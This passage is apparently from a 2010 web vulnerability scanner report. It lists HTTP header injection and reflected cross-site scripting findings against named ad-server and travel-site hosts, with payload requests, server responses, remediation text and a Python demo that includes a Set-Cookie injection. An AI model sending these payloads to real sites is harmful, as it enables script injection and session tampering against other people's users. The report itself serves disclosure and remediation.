P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 29806
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta name="descr ...[SNIP]... <a href="http://yuilibrary.com/forum/viewtopic.php?p=20001#p20001">DataTable and DataSource :: Not able to fetch all values using useXPath</a> ...[SNIP]...
3. HTTP header injection
There are 13 instances of this issue:
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 (all control characters, including the CR 0x0D and LF 0x0A used in every instance below) or equal to 0x7F should be rejected. Validation must be applied to the fully decoded value, after URL decoding, since the payloads below arrive as %0d%0a and only become line breaks once decoded.
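An added example, not code from the scanned redirector, that reproduces the flawed pattern in Python (a decoded request parameter copied into Location), parses the resulting bytes the way a client would to show the extra header line, and then applies the control-character check from the remediation text. The target URL is constructed; the parameter name c203c%0d%0ab84cdc07ffc is the scanner's payload from the first instance. It goes beyond the report in one respect: the second probe injects a Set-Cookie header through the parameter value, which is what an attacker would do with the same flaw.

```python
from urllib.parse import unquote


def validate_header_value(value: str) -> bool:
    """Reject anything below 0x20 (CR, LF, NUL, tab, ...) and DEL. An allowlist is stricter still."""
    return not any(ord(c) < 0x20 or ord(c) == 0x7F for c in value)


def build_redirect(location: str) -> bytes:
    """Serialise a 302 whose Location is the given string, exactly as it would go on the wire."""
    return (
        "HTTP/1.1 302 Found\r\n"
        f"Location: {location}\r\n"
        "Content-Length: 0\r\n\r\n"
    ).encode("latin-1")


def redirect_unsafe(target: str, param_name: str, param_value: str) -> bytes:
    """The flawed pattern: decoded request parameter name and value are copied straight into Location."""
    return build_redirect(f"{target}&{unquote(param_name)}={unquote(param_value)}")


def redirect_safe(target: str, param_name: str, param_value: str) -> bytes:
    """Same redirect, but both decoded values are validated once before touching a header."""
    name, value = unquote(param_name), unquote(param_value)   # decode exactly once, then validate
    if not (validate_header_value(name) and validate_header_value(value)):
        return b"HTTP/1.1 400 Bad Request\r\nContent-Length: 0\r\n\r\n"
    return build_redirect(f"{target}&{name}={value}")


def parse_response(raw: bytes):
    """Split a response the way an HTTP client does: status line, then one header per CRLF."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    status = lines[0].decode("latin-1")
    headers = []
    for line in lines[1:]:
        name, _, value = line.decode("latin-1").partition(":")
        headers.append((name.strip(), value.strip()))
    return status, headers


if __name__ == "__main__":
    target = "http://www.example.test/subscribe?utm_source=x"   # constructed redirect target
    scanner_probe = "c203c%0d%0ab84cdc07ffc"                    # payload from the report
    print(parse_response(redirect_unsafe(target, scanner_probe, "1")))
    # the same flaw used offensively: inject a cookie via the parameter value
    print(parse_response(redirect_unsafe(target, "c", "1%0d%0aSet-Cookie:%20sid=attacker")))
    print(parse_response(redirect_safe(target, scanner_probe, "1")))   # 400, nothing echoed
    print(parse_response(redirect_safe(target, "c203c", "1")))         # 302 with a clean Location
```

Decoding exactly once and validating the decoded string matters: validating the still-encoded form, or decoding a second time after validation, lets %250d%250a through.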
3.1. http://533.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://533.xg4ken.com
Path: /media/redir.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload c203c%0d%0ab84cdc07ffc was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /media/redir.php?prof=2&camp=490&affcode=kw403722&cid=5691665607&networkType=search&url[]=http%3A%2F%2Fwww.groupon.com%2Fsan-francisco%2Fsubscribe%3Futm_source%3DGoogle%26utm_medium%3Dcpc%26utm_campaign%3DSearch%26utm_term%3Dsan%20francisco%20cheap%20deals%26d%3DCalifornia_-_San_Francisco%26g%3DTest_-_expanded_-_Deals_-_City%26m%3Db%26k_clickID%3D_kenshoo_clickid_&c203c%0d%0ab84cdc07ffc=1 HTTP/1.1
Host: 533.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Found
Date: Sun, 12 Dec 2010 15:54:43 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=7d0a4400-0558-13e8-1316-00001ad51923; expires=Sat, 12-Mar-2011 15:54:43 GMT; path=/; domain=.xg4ken.com
Location: http://www.groupon.com/san-francisco/subscribe?utm_source=Google&utm_medium=cpc&utm_campaign=Search&utm_term=san francisco cheap deals&d=California_-_San_Francisco&g=Test_-_expanded_-_Deals_-_City&m=b&k_clickID=7d0a4400-0558-13e8-1316-00001ad51923&c203c b84cdc07ffc=1
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
The value of REST URL parameter 1 is copied into the Location response header. The payload 7246c%0d%0a336f6cb6a43 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /7246c%0d%0a336f6cb6a43/N553.ae.travelocity/B4838870.9 HTTP/1.1
Host: redacted.host.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7246c 336f6cb6a43/N553.ae.travelocity/B4838870.9:
Date: Sun, 12 Dec 2010 15:55:04 GMT
Server: GFE/2.0
Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 406f4%0d%0af4aac9b858d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /406f4%0d%0af4aac9b858d/N5762.218.EXPEDIA1/B4799014.4 HTTP/1.1
Host: redacted.host.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/406f4 f4aac9b858d/N5762.218.EXPEDIA1/B4799014.4:
Date: Sun, 12 Dec 2010 15:55:04 GMT
Server: GFE/2.0
Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 5c11b%0d%0ae5159c39387 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /5c11b%0d%0ae5159c39387/N553.ae.travelocity/B4838870.9;abr=!ie;sz=300x250;pc=[TPAS_ID];ord=kvydWa,bgqjIpabtsqs? HTTP/1.1
Host: redacted.host.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5c11b e5159c39387/N553.ae.travelocity/B4838870.9%3Babr%3D%21ie%3Bsz%3D300x250%3Bpc%3D%5BTPAS_ID%5D%3Bord%3DkvydWa%2CbgqjIpabtsqs:
Date: Sun, 12 Dec 2010 15:55:08 GMT
Server: GFE/2.0
Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 9c23b%0d%0a11544046e95 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /9c23b%0d%0a11544046e95/side.us.ky.web.car/results HTTP/1.1
Host: redacted.host.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9c23b 11544046e95/side.us.ky.web.car/results:
Date: Sun, 12 Dec 2010 15:54:58 GMT
Server: GFE/2.0
Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 97f69%0d%0ad27e7c101a5 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /97f69%0d%0ad27e7c101a5/side.us.ky.web.flight/results;oco=US;ost=TX;oci=HOUSTON;ocid=Houston;co=US;st=CA;ci=SAN_FRANCISCO;cid=San+Francisco;sd=26;sm=11;sy=2010;ed=2;em=0;ey=2011;cc=e;isTest=N;searchid=OlWNcX;sz=300x250;tile=14;source=direct;u=sid%3D9-fXtVzr7y8TdEbwwRNLf8%26tc%3DrnneEg-AAABLINUrNs-33-VrVYUw%26octid%3D31193%26dctid%3D13852;ord=1292168658272? HTTP/1.1
Host: redacted.host.name
Proxy-Connection: keep-alive
Referer: http://www.kayak.com/s/sparkle?action=getdccontent&url=http%3A%2F%2Fredacted.host.name%2Fadj%2Fside.us.ky.web.flight%2Fresults%3Boco%3DUS%3Bost%3DTX%3Boci%3DHOUSTON%3Bocid%3DHouston%3Bco%3DUS%3Bst%3DCA%3Bci%3DSAN_FRANCISCO%3Bcid%3DSan%2BFrancisco%3Bsd%3D26%3Bsm%3D11%3Bsy%3D2010%3Bed%3D2%3Bem%3D0%3Bey%3D2011%3Bcc%3De%3BisTest%3DN%3Bsearchid%3DOlWNcX%3Bsz%3D300x250%3Btile%3D14%3Bsource%3Ddirect%3Bu%3Dsid%253D9-fXtVzr7y8TdEbwwRNLf8%2526tc%253DrnneEg-AAABLINUrNs-33-VrVYUw%2526octid%253D31193%2526dctid%253D13852%3Bord%3D1292168658272%3F
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT; VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/97f69 d27e7c101a5/side.us.ky.web.flight/results%3Boco%3DUS%3Bost%3DTX%3Boci%3DHOUSTON%3Bocid%3DHouston%3Bco%3DUS%3Bst%3DCA%3Bci%3DSAN_FRANCISCO%3Bcid%3DSan%20Francisco%3Bsd%3D26%3Bsm%3D11%3Bsy%3D2010%3Bed%3D2%3Bem%3D0%3Bey%3D2011%3Bcc%3De%3BisTest%3DN%3Bsearchid%3DOlWNcX%3Bsz%3D300x250%3Btile%3D14%3Bsource%3Ddirect%3Bu%3Dsid%3D9-fXtVzr7y8TdEbwwRNLf8%26tc%3DrnneEg-AAABLINUrNs-33-VrVYUw%26oc:
Date: Sun, 12 Dec 2010 15:48:35 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 1db0e%0d%0a00880bed410 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /1db0e%0d%0a00880bed410/side.us.ky.web.hotel/results HTTP/1.1
Host: redacted.host.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1db0e
00880bed410/side.us.ky.web.hotel/results:
Date: Sun, 12 Dec 2010 15:54:59 GMT
Server: GFE/2.0
Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 80f50%0d%0a80f3182b8b0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /80f50%0d%0a80f3182b8b0/N5762.218.EXPEDIA1/B4799014.4 HTTP/1.1
Host: redacted.host.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/80f50
80f3182b8b0/N5762.218.EXPEDIA1/B4799014.4:
Date: Sun, 12 Dec 2010 15:55:14 GMT
Server: GFE/2.0
Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 7330f%0d%0a85cdd6a7713 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /7330f%0d%0a85cdd6a7713/priceline.dart/air_fare_results HTTP/1.1
Host: redacted.host.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7330f
85cdd6a7713/priceline.dart/air_fare_results:
Date: Sun, 12 Dec 2010 15:55:14 GMT
Server: GFE/2.0
Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 6f13d%0d%0ad1573db9588 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /6f13d%0d%0ad1573db9588/priceline.dart/air_fare_results_box HTTP/1.1
Host: redacted.host.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6f13d
d1573db9588/priceline.dart/air_fare_results_box:
Date: Sun, 12 Dec 2010 15:55:17 GMT
Server: GFE/2.0
Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 7bfd9%0d%0a4c013aaf98a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /7bfd9%0d%0a4c013aaf98a/N4253.expedia/B4807301.3 HTTP/1.1
Host: redacted.host.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: https://redacted.hostnameredacted.hostname/7bfd9
4c013aaf98a/N4253.expedia/B4807301.3:
Date: Sun, 12 Dec 2010 15:55:10 GMT
Server: GFE/2.0
Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 3dfb3%0d%0adb56d3ead8e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /3dfb3%0d%0adb56d3ead8e/N4253.expedia/B4807301.3;abr=!ie4;abr=!ie5;sz=160x600;ord=dqafok,bgqjIpouImwl? HTTP/1.1
Host: redacted.host.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: https://redacted.hostnameredacted.hostname/3dfb3
db56d3ead8e/N4253.expedia/B4807301.3%3Babr%3D%21ie4%3Babr%3D%21ie5%3Bsz%3D160x600%3Bord%3Ddqafok%2CbgqjIpouImwl:
Date: Sun, 12 Dec 2010 15:55:24 GMT
Server: GFE/2.0
Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload ff091%0d%0ad5095d46e22 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /ff091%0d%0ad5095d46e22/ShowCreateAccount.do HTTP/1.1
Host: travel.travelocity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SID=T0042007014101212094421020188304057814; Service=Travelocity; JSESSIONID=D97A419890F94FF6FEEE1A7CB80C0B53.p0608; JSID=D97A419890F94FF6FEEE1A7CB80C0B53.p0608; __utmz=54245047.1291431118.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tyrg1st=4D682B341EE14274; intentmedia_user_id=8f13f3ec-a554-4082-b332-38c3d456e131; __utma=54245047.882459144.1291431118.1291431118.1291431118.1; AIR=returningDate=01/02/2011&flightType=roundtrip&children=0&airlineSearchPref=&classOfService=ECONOMY&leavingDate=12/26/2010&minorsAge0=0&dateTypeSelect=exactDates&dateLeavingTime=Anytime&lowestFare=705&leavingFrom=HOU&seniors=0&fareType=all&adults=1&dateReturningTime=Anytime&minorsAge1=0&goingTo=SFO&minorsAge2=0&minorsAge3=0&minorsAge4=0; cbHistoryPerm=QWlyfEhPVXxTRk98MTIvMjYvMjAxMHwwMS8wMi8yMDExfFVTOg==; mbox=PC#1291431114561-411070.20#1293378239|check#true#1292168697|session#1292168636626-269062#1292170497;
Response
HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 16:02:11 GMT
Server: Apache
Location: http://travel.travelocity.com/ff091
d5095d46e22/ShowCreateAccount.do;jsessionid=D97A419890F94FF6FEEE1A7CB80C0B53.p0608
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
4. Cross-site scripting (reflected)
There are 74 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1244a"><script>alert(1)</script>fbde8380697 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe1244a"><script>alert(1)</script>fbde8380697/3.0/5147/1125747/0/154/ADTECH HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 231
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b71de"><script>alert(1)</script>fe6a5d0e85f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0b71de"><script>alert(1)</script>fe6a5d0e85f/5147/1125747/0/154/ADTECH HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 231
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b1ec"><script>alert(1)</script>1ed84af3af was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/51474b1ec"><script>alert(1)</script>1ed84af3af/1125747/0/154/ADTECH HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 230
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13e4a"><script>alert(1)</script>dfdf807cf83 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5147/112574713e4a"><script>alert(1)</script>dfdf807cf83/0/154/ADTECH HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 231
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5585"><script>alert(1)</script>81e00ef81c0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5147/1125747/0f5585"><script>alert(1)</script>81e00ef81c0/154/ADTECH HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 231
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46c09"><script>alert(1)</script>3d29c6dd0b1 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5147/1125747/0/15446c09"><script>alert(1)</script>3d29c6dd0b1/ADTECH HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 231
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba151"><script>alert(1)</script>5ede65b9fda was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5147/1125747/0/154/ADTECHba151"><script>alert(1)</script>5ede65b9fda HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 231
4.8. http://adserver.adtechus.com/adiframe/3.0/5147/1125747/0/154/ADTECH [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://adserver.adtechus.com
Path: /adiframe/3.0/5147/1125747/0/154/ADTECH
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e5a4"><script>alert(1)</script>a0a975e1ad0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5147/1125747/0/154/ADTECH?5e5a4"><script>alert(1)</script>a0a975e1ad0=1 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 234
The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33a4d"><script>alert(1)</script>431e51e6970 was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5147/1125747/0/154/ADTECH;target=_blank;key=33a4d"><script>alert(1)</script>431e51e6970 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 252
The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload d5c8c><script>alert(1)</script>e91811460c4 was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5147/1125747/0/154/ADTECH;target=d5c8c><script>alert(1)</script>e91811460c4 HTTP/1.1
Host: adserver.adtechus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 276
The value of the sealid request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 4649e%20style%3dx%3aexpression(alert(1))%20a0d5648a0d5 was submitted in the sealid parameter. This input was echoed as 4649e style=x:expression(alert(1)) a0d5648a0d5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /pvr.php?page=validate&url=www.cheapoair.com&sealid=1014649e%20style%3dx%3aexpression(alert(1))%20a0d5648a0d5 HTTP/1.1
Host: clicktoverify.truste.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 15:56:01 GMT
Server: Apache/2.2.2 (Unix) mod_ssl/2.2.2 OpenSSL/0.9.7a PHP/5.1.4
X-Powered-By: PHP/5.1.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 10799
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" >
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Validation Page for Online Privacy Certification b ...[SNIP]... <input type='hidden' name='sealid' value=1014649e style=x:expression(alert(1)) a0d5648a0d5> ...[SNIP]...
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62b9e"%3balert(1)//782c32c02ce was submitted in the mpck parameter. This input was echoed as 62b9e";alert(1)//782c32c02ce in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
